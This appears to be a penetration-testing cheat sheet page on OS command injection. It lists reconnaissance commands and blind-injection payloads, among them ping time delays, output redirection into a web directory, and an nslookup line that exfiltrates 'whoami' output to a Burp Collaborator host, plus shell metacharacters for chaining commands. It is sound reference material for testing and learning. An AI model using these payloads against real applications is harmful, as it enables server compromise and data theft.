OS Command Injection

Operating System Command/shell injection.

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.

Useful commands

Purpose of command

Linux

Windows

Name of current user

whoami

Operating system

uname -a

ver

Network configuration

ifconfig -a

ipconfig /all

Network connections

netstat -tunl

netstat -an

Running processes

ps -ef

tasklist

Blind OS command injection

Method

Command

Time delays

&ping -c 10 127.0.0.1

||ping+-c+10+127.0.0.1+||

Redirecting output

||whoami>/var/www/images/output.txt||

Out-Of-Band (OOB) DNS lookup. You can use Burp Collaborator

||nslookup+`whoami`.x.burpcollaborator.net||

||nslookup+x.burpcollaborator.net||

Useful meta characters

&
&&
|
||
;
Newline (0x0a or \n)
`injected command `
$( injected command )

PreviousServer Side NextInformation Disclosure

Last updated 1 year ago

hashtagUseful commands

hashtagBlind OS command injection

hashtagUseful meta characters

Useful commands

Blind OS command injection

Useful meta characters